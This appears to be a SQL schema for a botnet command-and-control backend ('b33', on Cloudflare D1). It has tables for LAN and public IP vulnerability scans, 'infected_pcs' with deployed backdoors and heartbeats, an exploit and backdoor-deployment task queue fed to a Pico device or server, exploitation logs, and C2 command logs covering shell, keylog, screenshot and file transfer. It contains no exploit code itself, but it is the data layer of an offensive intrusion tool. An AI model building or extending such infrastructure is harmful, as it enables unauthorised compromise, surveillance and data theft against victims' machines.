-- B33 Database Schema
-- Cloudflare D1 (SQLite-compatible)
-- Single database: b33
-- 6 tables total

--------------------------------------------------------------
-- Table 1: private_ip_scans
-- Stores results from LAN vulnerability scanning
--------------------------------------------------------------
CREATE TABLE IF NOT EXISTS private_ip_scans (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    scan_id TEXT NOT NULL UNIQUE,                -- UUID generated by Go server
    created_at TEXT NOT NULL DEFAULT (datetime('now')),
    target_ip TEXT NOT NULL,
    mac_address TEXT,
    hostname TEXT,                                -- Resolved hostname
    open_ports TEXT,                              -- JSON array: [22, 80, 443]
    detected_services TEXT,                      -- JSON array: [{"port":22,"service":"OpenSSH","version":"7.4"}]
    vulnerabilities_found TEXT,                  -- JSON array: [{"cve":"CVE-2023-1234","severity":"high","description":"..."}]
    network_ssid TEXT,
    network_bssid TEXT,                          -- WiFi access point MAC
    risk_level TEXT CHECK(risk_level IN ('none','low','medium','high','critical')),
    scan_source TEXT DEFAULT 'pico'              -- 'pico' or 'server'
);

CREATE INDEX IF NOT EXISTS idx_private_scans_ip ON private_ip_scans(target_ip);
CREATE INDEX IF NOT EXISTS idx_private_scans_risk ON private_ip_scans(risk_level);
CREATE INDEX IF NOT EXISTS idx_private_scans_created ON private_ip_scans(created_at);
CREATE INDEX IF NOT EXISTS idx_private_scans_ssid ON private_ip_scans(network_ssid);

--------------------------------------------------------------
-- Table 2: public_ip_scans
-- Stores results from public IP vulnerability scanning
--------------------------------------------------------------
CREATE TABLE IF NOT EXISTS public_ip_scans (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    scan_id TEXT NOT NULL UNIQUE,                -- UUID generated by Go server
    created_at TEXT NOT NULL DEFAULT (datetime('now')),
    target_ip TEXT NOT NULL,
    country_code TEXT,                            -- ISO 3166-1 alpha-2 (IL, US, etc.)
    city TEXT,                                    -- GeoIP city
    open_ports TEXT,                              -- JSON array: [22, 80, 443]
    detected_services TEXT,                      -- JSON array: [{"port":22,"service":"OpenSSH","version":"7.4"}]
    vulnerabilities_found TEXT,                  -- JSON array: [{"cve":"CVE-2023-1234","severity":"high","description":"..."}]
    risk_level TEXT CHECK(risk_level IN ('none','low','medium','high','critical')),
    scan_batch_id TEXT                           -- Group scans from same session
);

CREATE INDEX IF NOT EXISTS idx_public_scans_ip ON public_ip_scans(target_ip);
CREATE INDEX IF NOT EXISTS idx_public_scans_country ON public_ip_scans(country_code);
CREATE INDEX IF NOT EXISTS idx_public_scans_risk ON public_ip_scans(risk_level);
CREATE INDEX IF NOT EXISTS idx_public_scans_batch ON public_ip_scans(scan_batch_id);

--------------------------------------------------------------
-- Table 3: infected_pcs
-- Tracks all PCs with deployed backdoors
--------------------------------------------------------------
CREATE TABLE IF NOT EXISTS infected_pcs (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    pc_id TEXT NOT NULL UNIQUE,                  -- UUID
    created_at TEXT NOT NULL DEFAULT (datetime('now')),
    hostname TEXT,
    username TEXT,
    internal_ip TEXT,                             -- LAN IP
    external_ip TEXT,                             -- Public IP
    operating_system TEXT,                        -- e.g. "Windows 11 Pro 10.0.26200"
    architecture TEXT,                            -- e.g. "amd64", "arm64"
    backdoor_version TEXT,
    last_heartbeat TEXT,                          -- Last time backdoor checked in
    status TEXT CHECK(status IN ('active','inactive','removed')) DEFAULT 'active',
    deployment_method TEXT,                       -- 'usb_hid' or 'exploit'
    notes TEXT
);

CREATE INDEX IF NOT EXISTS idx_infected_status ON infected_pcs(status);
CREATE INDEX IF NOT EXISTS idx_infected_heartbeat ON infected_pcs(last_heartbeat);

--------------------------------------------------------------
-- Table 4: task_queue
-- Communication between web interface and Pico/server
-- Web interface creates tasks, Pico/server picks them up
--------------------------------------------------------------
CREATE TABLE IF NOT EXISTS task_queue (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    task_id TEXT NOT NULL UNIQUE,                 -- UUID
    created_at TEXT NOT NULL DEFAULT (datetime('now')),
    task_type TEXT NOT NULL CHECK(task_type IN ('exploit','scan_private','scan_public','deploy_backdoor','command')),
    target_ip TEXT,
    vulnerability_id TEXT,                        -- CVE ID if exploitation task
    payload TEXT,                                 -- JSON: additional task parameters
    status TEXT NOT NULL CHECK(status IN ('pending','assigned','in_progress','completed','failed')) DEFAULT 'pending',
    assigned_to TEXT,                             -- 'pico' or 'server'
    result TEXT,                                  -- JSON: execution result
    error_message TEXT,                           -- Error details if failed
    completed_at TEXT
);

CREATE INDEX IF NOT EXISTS idx_tasks_status ON task_queue(status);
CREATE INDEX IF NOT EXISTS idx_tasks_type ON task_queue(task_type);
CREATE INDEX IF NOT EXISTS idx_tasks_assigned ON task_queue(assigned_to);

--------------------------------------------------------------
-- Table 5: exploitation_logs
-- History of all exploitation attempts
--------------------------------------------------------------
CREATE TABLE IF NOT EXISTS exploitation_logs (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    created_at TEXT NOT NULL DEFAULT (datetime('now')),
    task_id TEXT REFERENCES task_queue(task_id),
    target_ip TEXT NOT NULL,
    vulnerability_id TEXT,                        -- CVE ID
    exploit_method TEXT,                          -- Description of exploit used
    success INTEGER NOT NULL DEFAULT 0,           -- 0 = failed, 1 = success
    backdoor_deployed INTEGER DEFAULT 0,          -- 0 = no, 1 = yes
    pc_id TEXT REFERENCES infected_pcs(pc_id),   -- If backdoor was deployed
    details TEXT,                                  -- JSON: detailed execution log
    error_message TEXT
);

CREATE INDEX IF NOT EXISTS idx_exploit_logs_target ON exploitation_logs(target_ip);
CREATE INDEX IF NOT EXISTS idx_exploit_logs_success ON exploitation_logs(success);

--------------------------------------------------------------
-- Table 6: c2_command_logs
-- Tracks every command sent to backdoored PCs
--------------------------------------------------------------
CREATE TABLE IF NOT EXISTS c2_command_logs (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    created_at TEXT NOT NULL DEFAULT (datetime('now')),
    pc_id TEXT NOT NULL REFERENCES infected_pcs(pc_id),
    command_type TEXT NOT NULL,                    -- 'shell', 'upload', 'download', 'screenshot', 'keylog', 'remove'
    command_data TEXT,                             -- The actual command or parameters
    status TEXT CHECK(status IN ('sent','received','completed','failed')) DEFAULT 'sent',
    result TEXT,                                   -- Command output/result
    completed_at TEXT
);

CREATE INDEX IF NOT EXISTS idx_c2_logs_pc ON c2_command_logs(pc_id);
CREATE INDEX IF NOT EXISTS idx_c2_logs_status ON c2_command_logs(status);
